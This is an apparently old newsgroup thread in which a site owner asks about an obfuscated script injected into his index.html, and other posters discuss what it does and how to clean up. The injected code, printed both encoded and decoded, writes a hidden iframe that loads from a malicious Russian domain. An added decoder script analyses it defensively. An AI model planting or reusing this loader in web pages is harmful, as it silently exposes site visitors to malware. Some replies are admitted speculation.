Strange javascript in my index.html file.

simon_smith214

Hi,

Somehow the index.html file of my website has been changed. What has
been added is:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d
%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e
%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d
%64%35%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f
%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d
%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d
%28%29%2a%32%36%38%34%35%29%2b%27%63%31%33%32%65%35%39%61%61%64%32%5c
%27%20%77%69%64%74%68%3d%35%39%20%68%65%69%67%68%74%3d
%34%35%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f
%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Which translates to:

"window.status='Done';document.write('<iframe name=d5 src=\'http://
traffurl.ru/sliv?'+Math.round(Math.random()*26845)+'c132e59aad2\'
width=59 height=455 style=\'display: none\'></iframe>')"));

Can anyone please explain what this means? traffurl.ru is listed as
dangerous by Google and ZoneAlarm and was registered in late December
2007.

Also, why would anyone have edited my index.html file to say this?

Thanks.
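An added example, not code from the thread: it decodes the injected eval(unescape("...")) snippet statically, with string operations only and never executing it, and reports what the written iframe would load and whether it is hidden. The sample input is the payload quoted above, joined back onto one line; the function names are my own.

```javascript
// Added example (not from the thread): decode an eval(unescape("...")) injection
// without executing it, then report where the hidden iframe points.
// Constructed sample: the payload quoted by the OP, joined back onto one line
// (the newlines in the post came from the newsreader, not from the file).
const INJECTED_HTML = '<script>eval(unescape("' + [
  '%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d',
  '%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e',
  '%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d',
  '%64%35%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f',
  '%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d',
  '%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d',
  '%28%29%2a%32%36%38%34%35%29%2b%27%63%31%33%32%65%35%39%61%61%64%32%5c',
  '%27%20%77%69%64%74%68%3d%35%39%20%68%65%69%67%68%74%3d',
  '%34%35%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f',
  '%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29',
].join('') + '")); </script>';

// Find every eval(unescape("...")) call in a page and return the encoded strings.
function extractEncodedPayloads(html) {
  const re = /eval\s*\(\s*unescape\s*\(\s*["']([^"']+)["']\s*\)\s*\)/gi;
  const found = [];
  let m;
  while ((m = re.exec(html)) !== null) found.push(m[1]);
  return found;
}

// Reproduce unescape()'s %XX and %uXXXX decoding with string ops only; no eval.
function decodePercent(encoded) {
  return encoded.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi, (_, u, h) =>
    String.fromCharCode(parseInt(u || h, 16)));
}

// Summarise what the decoded code would do if a browser ran it.
function analyse(decoded) {
  const src = /<iframe[^>]*?src=\\?['"]([^'"\\]+)/i.exec(decoded);
  return {
    writesIframe: /document\.write\s*\(\s*['"]<iframe/i.test(decoded),
    hidden: /display:\s*none/i.test(decoded),       // display: none => invisible
    target: src ? new URL(src[1]).hostname : null,  // host the iframe loads from
  };
}

// Scan a page: one finding per injected payload.
function scanPage(html) {
  return extractEncodedPayloads(html).map((p) => {
    const decoded = decodePercent(p);
    return { decoded, ...analyse(decoded) };
  });
}
console.log(JSON.stringify(scanPage(INJECTED_HTML), null, 2));
```

Run it over a saved copy of the defaced file rather than opening that file in a browser; the decoded output is what the thread shows below, with the target host available for blocking and log searches.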

John W. Kennedy

Hi,

Somehow the index.html file of my website has been changed. What has
been added is:
.....

I am not a security expert, so I can only warn you to do the safe thing.

Shut down your system at once, disconnect it from the Internet, and get
in touch at once with a professional security expert and the FBI, or
whatever agency is appropriate in your country. Until proof is found to
the contrary, you must assume that this is A) malicious work by
professional criminals, and B) designed to infect everyone who views
your page.

Stevo

Which translates to:

"window.status='Done';document.write('<iframe name=d5 src=\'http://
traffurl.ru/sliv?'+Math.round(Math.random()*26845)+'c132e59aad2\'
width=59 height=455 style=\'display: none\'></iframe>')"));

Can anyone please explain what this means? traffurl.ru is listed as
dangerous by Google and ZoneAlarm and was registered in late December
2007.

Also, why would anyone have edited my index.html file to say this?

This is exactly the type of thing we had a discussion on here recently
about. People think that by not going to porn/warez/nasty websites,
they're fairly safe from receiving malicious code that breaks through
unplugged security holes in their browsers. Generally that has some
truth to it, but not in cases like this. It looks like your site has
been hacked. The main intention being that they want your site to
include this iframe to their site. The effect being that you're driving
people to their site unknowingly and they're most likely being affected
(if they haven't had all their Windows updates and/or kept their Virus
signatures up to date). Even if a user is all up to date, there are
still holes that malicious code can get through. What John Kennedy
said regarding shutting down and contacting your nearest equivalent of
the FBI might sound a bit overdramatic, but in principle what he's
saying is correct. At the very least, you want to make sure your remote
router admin is disabled. You might want to do a hard-reset of it to
revert to the original password (as the hacker might have changed it).
Make sure you put a good password in (assuming this is the way you were
hacked). Do you keep backups?

Stevo

Randy said:
Stevo said the following on 2/10/2008 4:23 AM:
As for it being a site that you are "driving visitors" to, that is
nonsense. The iframe is hidden - display: none. Doesn't make a lot of
sense to drive someone to your site if you hide the window it is going
to be displayed in.

Bet you an internet beer it is a tracking site.

Mine's an Internet Grimbergen. Why would the iframe need to be visible?
It still would load up its html page and download its nasty payload. I
would think that having it invisible increases the chances that the
bemused user doesn't panic and close the browser immediately. They'd be
just staring at it (in its "Done" state) wondering "yeah? and now? do
something then!". Little do they realize that the invisible iframe is
already doing just what it wanted.

The Magpie

Randy said:
I agree that something got whacked somewhere. But, before you can
even answer the question, you would have to know where the "file"
is served from. It could be on a server that has free FTP - for a
price - and is silently inserting it.
Agreed, you do.

As for it being a site that you are "driving visitors" to, that is
nonsense. The iframe is hidden - display: none. Doesn't make a lot
of sense to drive someone to your site if you hide the window it is
going to be displayed in.
Correct - nothing to do with the site location.
Bet you an internet beer it is a tracking site.
There, you lose.

It's a trojan disguised as a codec and drops quietly and happily into
your system through Media Player (unless you are one of the few
cautious types who set it to choose "Don't download codecs without
bloody asking me first!"). For the OP this means a couple of things.

1. Your PC is now infected and has been recruited into a botnet.
2. Your website is infecting other PCs every time one visits it.
3. Your PC is now being used by a - probably criminal - gang.
4. The hard one - you know about it, so you are responsible.

In essence, this means fix the website, or you could be sued. Clean
your PC, or you could be sued. Report the hacking to your hosting
provider, or you could be sued. Report it to your local or national
police, or - worst of all - you could be charged as an accessory to
the criminal activity probably now going on with your PC and with all
your website visitors. Yes, this is serious. You need to deal with it.

Stevo

The Magpie said:
It's a trojan disguised as a codec and drops quietly and happily into
your system through Media Player (unless you are one of the few cautious
types who set it to choose "Don't download codecs without bloody asking
me first!"). For the OP this means a couple of things.

Great Info. I didn't know that. I've now joined the group of cautious
types :) I foolishly thought that windows media player would only
download codecs from a pre-tested library of them that it maintained on
a microsoft server. If it blindly takes the codec URL out of the video
file (or now I think about it, more likely out of the codebase tag of
the object/embed) then that's a serious risk. This option in Windows
Media Player is in the Tools-Options (Player tab). Better check Real
Player and Quicktime too :(

Stevo

Stevo said:
Great Info. I didn't know that. I've now joined the group of cautious
types :) I foolishly thought that windows media player would only
download codecs from a pre-tested library of them that it maintained on
a microsoft server. If it blindly takes the codec URL out of the video
file (or now I think about it, more likely out of the codebase tag of
the object/embed) then that's a serious risk. This option in Windows
Media Player is in the Tools-Options (Player tab). Better check Real
Player and Quicktime too :(

Don't be ridiculous Stevo. The codebase tag won't be used for the codec,
that would only be for the ActiveX control for the player itself. Try
drinking some coffee before your first post next time fool!

The Magpie

Randy said:
The Magpie said the following on 2/11/2008 7:40 PM:

I will have to email you a beer sometime.
It's the joy of a slightly shady past, Randy.... I know where to look
for details of these things. Seriously though, I used to work with
security firms and it really is worthwhile knowing a few of the source
sites - even if some are quite openly hacker sites.

If you are interested - and fairly brave, or have a quarantine machine
or a safe VM you can put at risk - the site I found details of this
little horror on is http://www.malwaredomainlist.com/

Be warned though - it really is a collection of not-at-all-safe
domains you can look at for details.

The Magpie

Stevo said:
Great Info. I didn't know that. I've now joined the group of cautious
types :) I foolishly thought that windows media player would only
download codecs from a pre-tested library of them that it maintained on
a microsoft server. If it blindly takes the codec URL out of the video
file (or now I think about it, more likely out of the codebase tag of
the object/embed) then that's a serious risk. This option in Windows
Media Player is in the Tools-Options (Player tab). Better check Real
Player and Quicktime too :(

Oh bugger! I never even considered RealPlayer myself - that's a great
point and very timely. Thanks.

Thomas 'PointedEars' Lahn

John said:
....

I am not a security expert, so I can only warn you to do the safe thing.

Shut down your system at once, disconnect it from the Internet,

Definitely. The next thing would be to set it up completely new and install
all security patches *before* connecting it to any network again, after
which one would want to change all passwords and other sensible login
information.

It would also be prudent not to install snake-oil software and instead
disable unnecessary services (that keep ports open) this time:

[en] http://www.iks-jena.de/mitarb/lutz/usenet/Firewall.en.html
[de] http://www.iks-jena.de/mitarb/lutz/usenet/Firewall.html

And although I'm not sure about the circumstances, the OP should definitely
avoid using a desktop PC as a public Web server.

and get in touch at once with a professional security expert and the FBI, or
whatever agency is appropriate in your country.

Given that the host name of the URL cannot be resolved, that might be
breaking a fly on the wheel. Especially since local authorities would have
certain problems prosecuting any vulnerability attack coming from servers
abroad (the OP is probably located in Germany as his NNTP-Posting-Host
header value indicates an IPv5 address belonging to the IP address range of
Strato GmbH, Berlin).

Until proof is found to the contrary, you must assume that this is A)
malicious work by professional criminals, and B) designed to infect
everyone who views your page.

You are jumping to conclusions, which makes your recommendation rather FUD
than sound advice. There is not even proof of an attempt at infection
(until further notice), only of one compromised system that may have been
cracked by J. Random Cracker using any of the prepackaged cracking toolkits
that are searching for known vulnerabilities of unpatched systems and are
available online for free.


PointedEars

The Magpie

Thomas said:
You are jumping to conclusions, which makes your recommendation rather FUD
than sound advice.
I did jump to the conclusion that other machines had already been
compromised, but the code is comparatively well-known and reported so
I read the reports. You are right though - I presumed what the reports
said the software did had happened to the OP, and I should not have
done that.